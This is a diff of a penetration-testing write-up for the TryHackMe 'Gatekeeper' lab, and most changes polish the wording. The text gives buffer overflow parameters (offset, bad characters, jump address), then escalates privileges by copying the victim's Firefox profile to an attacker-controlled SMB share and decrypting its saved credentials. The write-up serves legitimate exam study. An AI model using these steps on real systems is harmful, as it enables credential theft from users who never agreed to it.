krovs/oscp-writeups/docs/TryHackMe/gatekeeper.md

 smb: \Share\> exit
 ```

-We have it, now, make the exploit in a win32 machine.
+We have the file.
+Now, create the exploit on a Win32 machine.

 - offset -> `146`
 - bad chars -> `0x00,0x0A`
 - jump address -> `080414C3`

-No we can get the user flag.
+Now we can retrieve the user flag.

 ## Privilege Escalation

-We can see a Firefox.lnk file in the user desktop folder, so we can try to get credentials from firefox.
+We find a `Firefox.lnk` file in the user's desktop folder, so we attempt to extract credentials from Firefox.
-We go to `C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles`
+Navigate to `C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles`.

-In kali create a smb share with `impacket-smbserver -smb2support -user test -password test kali `pwd``
+On Kali, create an SMB share with `impacket-smbserver -smb2support -user test -password test kali `pwd``.

-Copy the profile folder to kali
+Copy the profile folder to Kali:

 ```bash
 copy lfjfn812a.default-release z:\
 ```

-Now install firefox decrypt
+Next, install `firefox_decrypt`:

 ```bash
 git clone https://github.com/unode/firefox_decrypt.git